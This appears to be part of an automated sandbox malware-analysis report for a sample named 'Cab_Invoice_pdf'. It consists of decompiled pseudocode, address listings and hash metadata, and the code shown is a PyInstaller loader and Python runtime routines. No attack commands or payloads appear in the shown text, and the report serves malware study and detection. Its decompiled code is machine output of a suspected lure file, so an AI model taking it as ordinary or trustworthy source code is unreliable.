								__eflags = _t49;
								if(_t49 != 0) {
									L8:
									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
									_t98 = _a12296;
									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
									__eflags = _t77;
									if(_t77 != 0) {
										L11:
										__imp__SetDllDirectoryW(E01314BF0(0, _t77, 0));
										L01319803(_t50);
										_t114 = _t112 + 0x10;
										__eflags = _t77;
										if(_t77 == 0) {
											_t98 = _a12292;
											goto L25;
										} else {
											_t85 = _t77;
											_t63 =  &_a4092;
											while(1) {
												_t91 =  *_t63;
												__eflags = _t91 -  *_t85;
												if(_t91 !=  *_t85) {
													break;
												}
												__eflags = _t91;
												if(_t91 == 0) {
													L17:
													_t64 = 0;
												} else {
													_t91 =  *((intOrPtr*)(_t63 + 1));
													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
														break;
													} else {
														_t63 = _t63 + 2;
														_t85 = _t85 + 2;
														__eflags = _t91;
														if(_t91 != 0) {
															continue;
														} else {
															goto L17;
														}
													}
												}
												L19:
												__eflags = _t64;
												if(__eflags == 0) {
													L23:
													_push(_t93);
													E01312140(_t91, __eflags);
													_t101 = E01312010(_t77, __eflags, _t93);
													L01312130(_t93);
													_t115 = _t114 + 0xc;
													goto L31;
												} else {
													_t21 = _t93 + 0x2068; // 0x2068
													_t102 = _t21;
													_t52 = E01311AC0(_t102, 0x1000, "%s", _t77);
													_t115 = _t114 + 0x10;
													__eflags = _t52 - 0x1000;
													if(_t52 >= 0x1000) {
														goto L27;
													} else {
														_t22 = _t93 + 0x3068; // 0x3068
														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
														_t87 = _t22 - _t102;
														__eflags = _t87;
														do {
															_t68 =  *_t102;
															_t102 = _t102 + 1;
															 *((char*)(_t87 + _t102 - 1)) = _t68;
															__eflags = _t68;
														} while (__eflags != 0);
														goto L23;
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t64 = _t63 | 0x00000001;
											__eflags = _t64;
											goto L19;
										}
									} else {
										_t69 = E013121D0(_t93);
										_t114 = _t112 + 4;
										__eflags = _t69;
										if(_t69 != 0) {
											L25:
											_t52 = E01312070(_t90, _t104, _t93);
											_t115 = _t114 + 4;
											__eflags = _t52;
											if(_t52 != 0) {
												L27:
												_t53 = _t52 | 0xffffffff;
											} else {
												__eflags =  *((char*)(_t93 + 0x2068));
												_t29 = _t93 + 0x2068; // 0x2068
												_t79 = _t29;
												_t55 =  !=  ? _t79 :  &_a4092;
												E01314390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
												_push("_MEIPASS2");
												E01313E40(_t79, _t93);
												_push(_t93);
												_t52 = E013180A0();
												_t115 = _t115 + 0x10;
												__eflags = _t52 - 0xffffffff;
												if(__eflags != 0) {
													E013123D0(_t52);
													_push(_t104);
													_push(_t98);
													_push(_t93);
													_push( &_v4);
													_t60 = E01314400(_t90, _t104, __eflags);
													_t117 = _t115 + 0x10;
													_t101 = _t60;
													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
														_push(_t79);
														E013140E0(_t90);
														_t117 = _t117 + 4;
													}
													E01311730(_t90, _t104, _t93);
													_t115 = _t117 + 4;
													L31:
													_t53 = _t101;
												} else {
													goto L27;
												}
											}
										} else {
											_t77 =  &_a4096;
											goto L11;
										}
									}
									L32:
									__eflags = _a12284 ^ _t115;
									E0131786A();
									return _t53;
								} else {
									_t71 = E01311690(_t104, _t93,  &_a8192);
									_t112 = _t112 + 8;
									__eflags = _t71;
									if(__eflags != 0) {
										goto L8;
									} else {
										_push( &_a8192);
										_t74 = E01311910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
										__eflags = _a12288 ^ _t112 + 0x0000000c;
										E0131786A();
										return _t74 | 0xffffffff;
									}
								}
							}
						}
					}
				} else {
					L1:
					E0131786A();
					return _t39 | 0xffffffff;
				}
			}






































                            0x01312450
                            0x01312450
                            0x01312455
                            0x0131245a
                            0x01312461
                            0x01312469
                            0x0131247e
                            0x01312483
                            0x01312485
                            0x0131248a
                            0x0131248c
                            0x01312491
                            0x013124b5
                            0x013124ba
                            0x013124bd
                            0x013124bf
                            0x00000000
                            0x013124c1
                            0x013124ce
                            0x013124d3
                            0x013124d6
                            0x013124d8
                            0x00000000
                            0x013124da
                            0x013124e7
                            0x013124ec
                            0x013124ef
                            0x013124f1
                            0x00000000
                            0x013124f3
                            0x013124f3
                            0x013124f4
                            0x01312503
                            0x01312505
                            0x01312510
                            0x01312515
                            0x01312518
                            0x0131251a
                            0x01312566
                            0x01312566
                            0x0131256d
                            0x01312574
                            0x0131257a
                            0x0131257c
                            0x01312596
                            0x013125a6
                            0x013125ad
                            0x013125b2
                            0x013125b5
                            0x013125b7
                            0x0131264f
                            0x00000000
                            0x013125bd
                            0x013125bd
                            0x013125bf
                            0x013125c6
                            0x013125c6
                            0x013125c8
                            0x013125ca
                            0x00000000
                            0x00000000
                            0x013125cc
                            0x013125ce
                            0x013125e2
                            0x013125e2
                            0x013125d0
                            0x013125d0
                            0x013125d3
                            0x013125d6
                            0x00000000
                            0x013125d8
                            0x013125d8
                            0x013125db
                            0x013125de
                            0x013125e0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013125e0
                            0x013125d6
                            0x013125eb
                            0x013125eb
                            0x013125ed
                            0x01312633
                            0x01312633
                            0x01312634
                            0x01312640
                            0x01312642
                            0x01312647
                            0x00000000
                            0x013125ef
                            0x013125f5
                            0x013125f5
                            0x01312601
                            0x01312606
                            0x01312609
                            0x0131260e
                            0x00000000
                            0x01312614
                            0x01312614
                            0x0131261a
                            0x01312624
                            0x01312624
                            0x01312626
                            0x01312626
                            0x01312628
                            0x0131262b
                            0x0131262f
                            0x0131262f
                            0x00000000
                            0x01312626
                            0x0131260e
                            0x00000000
                            0x013125ed
                            0x013125e6
                            0x013125e8
                            0x013125e8
                            0x00000000
                            0x013125e8
                            0x0131257e
                            0x0131257f
                            0x01312584
                            0x01312587
                            0x01312589
                            0x01312656
                            0x01312657
                            0x0131265c
                            0x0131265f
                            0x01312661
                            0x0131269d
                            0x0131269d
                            0x01312663
                            0x01312663
                            0x0131266a
                            0x0131266a
                            0x01312677
                            0x01312680
                            0x01312685
                            0x0131268a
                            0x0131268f
                            0x01312690
                            0x01312695
                            0x01312698
                            0x0131269b
                            0x013126a2
                            0x013126a7
                            0x013126a8
                            0x013126ad
                            0x013126ae
                            0x013126af
                            0x013126b4
                            0x013126b7
                            0x013126b9
                            0x013126c0
                            0x013126c2
                            0x013126c3
                            0x013126c8
                            0x013126c8
                            0x013126cc
                            0x013126d1
                            0x013126d4
                            0x013126d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131269b
                            0x0131258f
                            0x0131258f
                            0x00000000
                            0x0131258f
                            0x01312589
                            0x013126d6
                            0x013126e1
                            0x013126e3
                            0x013126ee
                            0x0131251c
                            0x01312525
                            0x0131252a
                            0x0131252d
                            0x0131252f
                            0x00000000
                            0x01312531
                            0x01312538
                            0x01312543
                            0x01312558
                            0x0131255a
                            0x01312565
                            0x01312565
                            0x0131252f
                            0x0131251a
                            0x013124f1
                            0x013124d8
                            0x01312493
                            0x01312493
                            0x013124a1
                            0x013124ac
                            0x013124ac

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: dffe867397ba665d527c2e4ccea01c2d23e59236fb42a2c769eb9d179c04e0e1
                            • Instruction ID: 93bdbb5c386e00a41ef0e1bbfab3993a0dbfec71828cc0138c1bc439c1b77d31
                            • Opcode Fuzzy Hash: dffe867397ba665d527c2e4ccea01c2d23e59236fb42a2c769eb9d179c04e0e1
                            • Instruction Fuzzy Hash: 5451B3B29043066BE72DE7399C41BFBB79CAF5036CF140929F94882249F725D618C273
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013135B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E013135B0(void* __edx, signed int _a8196, intOrPtr _a8204) {
				char _v0;
				void* __ebx;
				intOrPtr __ebp;
				signed int _t17;
				intOrPtr _t45;
				void* _t49;
				char* _t52;
				intOrPtr* _t54;
				signed int _t59;

				_t49 = __edx;
				E01317880();
				_t17 =  *0x133c008; // 0xa212446c
				_a8196 = _t17 ^ _t59;
				_t45 = _a8204;
				_t54 =  *((intOrPtr*)(_t45 + 8));
				 *((intOrPtr*)( *0x133c95c)) = 1;
				 *((intOrPtr*)( *0x133c958)) = 1;
				 *((intOrPtr*)( *0x133c970)) = 1;
				 *((intOrPtr*)( *0x133c974)) = 1;
				 *((intOrPtr*)( *0x133c96c)) = 1;
				_t24 =  *0x133c968;
				 *((intOrPtr*)( *0x133c968)) = 0;
				if(_t54 >=  *((intOrPtr*)(_t45 + 0xc))) {
					L15:
					L16:
					E0131786A();
					return 0;
				}
				do {
					if( *((char*)(_t54 + 0x11)) != 0x6f) {
						goto L12;
					}
					_t52 = _t54 + 0x12;
					_t24 = E01319780(_t52, "pyi-", 4);
					_t59 = _t59 + 0xc;
					if(_t24 == 0) {
						goto L12;
					}
					_t24 =  *_t52 + 0xffffffb1;
					if(_t24 > 0x27) {
						goto L12;
					}
					_t7 = _t24 + E01313798; // 0xd2da
					switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M01313784))) {
						case 0:
							__eax =  *0x133c960;
							goto L11;
						case 1:
							__esi + 0x14 =  &_v0;
							__eflags = E0131D7BF( &_v0, __esi + 0x14, 0x1000) - 0xffffffff;
							if(__eflags == 0) {
								__eax = __esi + 0x14;
								E01311910(__eflags, "Failed to convert Wflag %s using mbstowcs (invalid multibyte string)\n", __esi + 0x14) = __eax | 0xffffffff;
								goto L16;
							}
							__eax =  &_v0;
							_push( &_v0);
							__eax =  *0x133c9e0();
							__esp = __esp + 4;
							goto L12;
						case 2:
							__ebp = 1;
							goto L12;
						case 3:
							_t24 =  *0x133c968;
							L11:
							 *_t24 = 1;
							goto L12;
						case 4:
							goto L12;
					}
					L12:
					_push(_t54);
					_t54 = _t24;
					_t59 = _t59 + 8;
				} while (_t54 <  *((intOrPtr*)(_t45 + 0xc)));
				if(0 != 0) {
					_push(0x8000);
					_push(E013209C5(E0131A7EB(0)));
					E0131D852(_t45, _t49, 0);
					_push(0x8000);
					_push(E013209C5(E0131A7EB(1)));
					E0131D852(_t45, _t49, 0);
					_push(E0131A7EB(1));
					E0131DBBF(_t49, 0);
					_push(E0131A7EB(2));
					E0131DBBF(_t49, 0);
					E0131D2BE(E0131A7EB(0), 0);
					E0131D2BE(E0131A7EB(1), 0);
					E0131D2BE(E0131A7EB(2), 0);
					_t59 = _t59 + 0x54;
				}
				goto L15;
			}












                            0x013135b0
                            0x013135b5
                            0x013135ba
                            0x013135c1
                            0x013135ce
                            0x013135d9
                            0x013135dc
                            0x013135e8
                            0x013135f3
                            0x013135fe
                            0x01313609
                            0x0131360f
                            0x01313614
                            0x01313619
                            0x01313750
                            0x01313752
                            0x0131375f
                            0x0131376a
                            0x0131376a
                            0x01313620
                            0x01313624
                            0x00000000
                            0x00000000
                            0x01313628
                            0x01313631
                            0x01313636
                            0x0131363b
                            0x00000000
                            0x00000000
                            0x01313640
                            0x01313646
                            0x00000000
                            0x00000000
                            0x01313648
                            0x0131364f
                            0x00000000
                            0x01313693
                            0x00000000
                            0x00000000
                            0x0131366d
                            0x0131367a
                            0x0131367d
                            0x0131376b
                            0x0131377c
                            0x00000000
                            0x0131377c
                            0x01313683
                            0x01313687
                            0x01313688
                            0x0131368e
                            0x00000000
                            0x00000000
                            0x0131365d
                            0x00000000
                            0x00000000
                            0x01313656
                            0x01313698
                            0x01313698
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131369e
                            0x0131369e
                            0x013136a5
                            0x013136a7
                            0x013136aa
                            0x013136b5
                            0x013136bb
                            0x013136d0
                            0x013136d1
                            0x013136d9
                            0x013136ee
                            0x013136ef
                            0x013136fb
                            0x013136fc
                            0x01313708
                            0x01313709
                            0x0131371e
                            0x01313733
                            0x01313748
                            0x0131374d
                            0x0131374d
                            0x00000000

                            APIs
                            • PySys_AddWarnOption.PYTHON38(?), ref: 01313688
                            Strings
                            • pyi-, xrefs: 0131362B
                            • Failed to convert Wflag %s using mbstowcs (invalid multibyte string), xrefs: 0131376F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: OptionSys_Warn
                            • String ID: Failed to convert Wflag %s using mbstowcs (invalid multibyte string)$pyi-
                            • API String ID: 4187674166-3625900369
                            • Opcode ID: 666c41bdf7de9e096ecb0c5b68e38e9c53ef5f2e633aeb55c23729cb5f7d8185
                            • Instruction ID: fdd8f5a7d1d60d0c3ab1e2871f66741040605a88a3bed3f4477847d5e8e170ae
                            • Opcode Fuzzy Hash: 666c41bdf7de9e096ecb0c5b68e38e9c53ef5f2e633aeb55c23729cb5f7d8185
                            • Instruction Fuzzy Hash: 0F415DB19003015BD328BBBCDC85F5677AC7F25329F040814FE09A72CAEA75E5148772
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F4080, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E79ED94,no such name), ref: 6E2F40C3
                            • PyUnicode_FromString.PYTHON38(?), ref: 6E2F40F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: String$Err_FromUnicode_
                            • String ID: no such name
                            • API String ID: 3678473424-4211486178
                            • Opcode ID: 0af948b93d2c98ec9421c8e47411501e5e707f8e3cbdebb95076208a781765fa
                            • Instruction ID: 8b9d4f61ddab0e6b685b0037b9f518e2d2716d4026663da8f5be54e221697741
                            • Opcode Fuzzy Hash: 0af948b93d2c98ec9421c8e47411501e5e707f8e3cbdebb95076208a781765fa
                            • Instruction Fuzzy Hash: 4A014931E5010CDBDB04DBA4ED01AFDB3BDEF05305F1001A9ED0A97201EEA15E1587C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2830, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6E2F2830(void* __ecx, signed int __edx) {
				signed int _t21;
				signed char _t22;
				void* _t24;
				signed int _t29;
				void* _t30;
				signed int _t31;
				void* _t33;

				_t29 = __edx;
				_t30 = __ecx;
				if(__edx < 0x110000) {
					_t21 =  *(0x6e3cd570 + ((( *(0x6e398078 + (__edx >> 7) * 2) & 0x0000ffff) << 7) + (__edx & 0x0000007f)) * 2) & 0x0000ffff;
				} else {
					_t21 = 0;
				}
				_t22 = _t21 + _t21 * 2;
				_t31 =  *(0x6e32d854 + _t22 * 2) & 0x000000ff;
				if(_t30 == 0 ||  *((intOrPtr*)(_t30 + 4)) != 0x6e3f8128) {
					L9:
					__imp__PyUnicode_FromString( *((intOrPtr*)(_t31 * 4 + "Xb/n\\b/n`b/ndb/nhb/nlb/n")));
					return _t22;
				} else {
					_t24 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0xc))))(_t29);
					_t33 = _t33 + 4;
					if( *((char*)(_t24 + 1)) != 0) {
						_t22 =  *((intOrPtr*)(_t24 + 4));
						if(_t22 != 0xff) {
							_t31 = _t22 & 0x000000ff;
						}
						goto L9;
					} else {
						__imp__PyUnicode_FromString( *((intOrPtr*)(0 + "Xb/n\\b/n`b/ndb/nhb/nlb/n")));
						return _t24;
					}
				}
			}










                            0x6e2f2830
                            0x6e2f2832
                            0x6e2f283a
                            0x6e2f2857
                            0x6e2f283c
                            0x6e2f283c
                            0x6e2f283c
                            0x6e2f285f
                            0x6e2f2862
                            0x6e2f286c
                            0x6e2f28a5
                            0x6e2f28ac
                            0x6e2f28b7
                            0x6e2f2877
                            0x6e2f287b
                            0x6e2f287d
                            0x6e2f2884
                            0x6e2f289b
                            0x6e2f28a0
                            0x6e2f28a2
                            0x6e2f28a2
                            0x00000000
                            0x6e2f2886
                            0x6e2f288f
                            0x6e2f289a
                            0x6e2f289a
                            0x6e2f2884

                            APIs
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F288F
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F28AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FromStringUnicode_
                            • String ID: Xb/n\b/n`b/ndb/nhb/nlb/n
                            • API String ID: 2818169177-1585766530
                            • Opcode ID: d0e25e66c5b746f5dd10d5ece357e1d7cffab875717632448742467f954b223a
                            • Instruction ID: 6f786e917d6583c341b5879f8595a1bdd9f2e6627586dcaeb13c4aac9fd3250b
                            • Opcode Fuzzy Hash: d0e25e66c5b746f5dd10d5ece357e1d7cffab875717632448742467f954b223a
                            • Instruction Fuzzy Hash: 9C019CF2D6047ADFCB400B9CE4086697BA79FC36117090039E08547124EA25C4A7C6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2500, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • _PyUnicode_ToDecimalDigit.PYTHON38 ref: 6E2F252F
                            • PyErr_SetString.PYTHON38(6E79ED94,not a decimal), ref: 6E2F254F
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DecimalDigitErr_StringUnicode_
                            • String ID: not a decimal
                            • API String ID: 2362873022-3590249192
                            • Opcode ID: 54dc7f4be1437a02d7ccaff90b14f19795e5e1caacc073543e06fcea4189097d
                            • Instruction ID: 68f780d6c5cc3243e8f9ebe23ba0016162f81092bb4f14e6245d1308ed59c5ff
                            • Opcode Fuzzy Hash: 54dc7f4be1437a02d7ccaff90b14f19795e5e1caacc073543e06fcea4189097d
                            • Instruction Fuzzy Hash: 61F02DB21D515ADFDB054BD8F858A95B7AADF03227B0840B5E40DCB212F322D513C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • _PyUnicode_ToDigit.PYTHON38 ref: 6E2F2574
                            • PyErr_SetString.PYTHON38(6E79ED94,not a digit), ref: 6E2F2594
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DigitErr_StringUnicode_
                            • String ID: not a digit
                            • API String ID: 1987352478-3016634541
                            • Opcode ID: 8e43bcc6a2b96b17e994c0ab81a5a6792c10a94486d24789e76c4d85de8a6488
                            • Instruction ID: deb6a7f5e582100a1bf68e32b380f58ed45b7ca5361fdfc315db9258387d2b60
                            • Opcode Fuzzy Hash: 8e43bcc6a2b96b17e994c0ab81a5a6792c10a94486d24789e76c4d85de8a6488
                            • Instruction Fuzzy Hash: 1EE04F716A4509DFEB009FA4E88991537BAFB4266A7144075ED0ECA212F732D128DBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131D646, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131D646(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E0131AFAE(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E01325F84(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					return E01321788() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                            0x0131d646
                            0x0131d64f
                            0x0131d654
                            0x0131d657
                            0x0131d65b
                            0x0131d66a
                            0x0131d66d
                            0x0131d68d
                            0x0131d692
                            0x0131d695
                            0x0131d697
                            0x0131d765
                            0x0131d76b
                            0x0131d780
                            0x0131d78c
                            0x0131d792
                            0x0131d794
                            0x0131d7a3
                            0x0131d7a3
                            0x0131d7a3
                            0x0131d7a6
                            0x0131d7a6
                            0x0131d7aa
                            0x0131d7ac
                            0x0131d7af
                            0x0131d7af
                            0x0131d7af
                            0x0131d7af
                            0x00000000
                            0x0131d7b6
                            0x0131d79b
                            0x00000000
                            0x0131d79b
                            0x0131d76d
                            0x0131d770
                            0x0131d773
                            0x0131d773
                            0x0131d775
                            0x0131d776
                            0x0131d776
                            0x0131d77a
                            0x00000000
                            0x0131d77a
                            0x0131d69d
                            0x0131d6a3
                            0x0131d6d0
                            0x0131d6dc
                            0x0131d6e2
                            0x0131d6e4
                            0x00000000
                            0x00000000
                            0x0131d6ea
                            0x0131d6f0
                            0x0131d6f3
                            0x0131d74f
                            0x0131d754
                            0x0131d75c
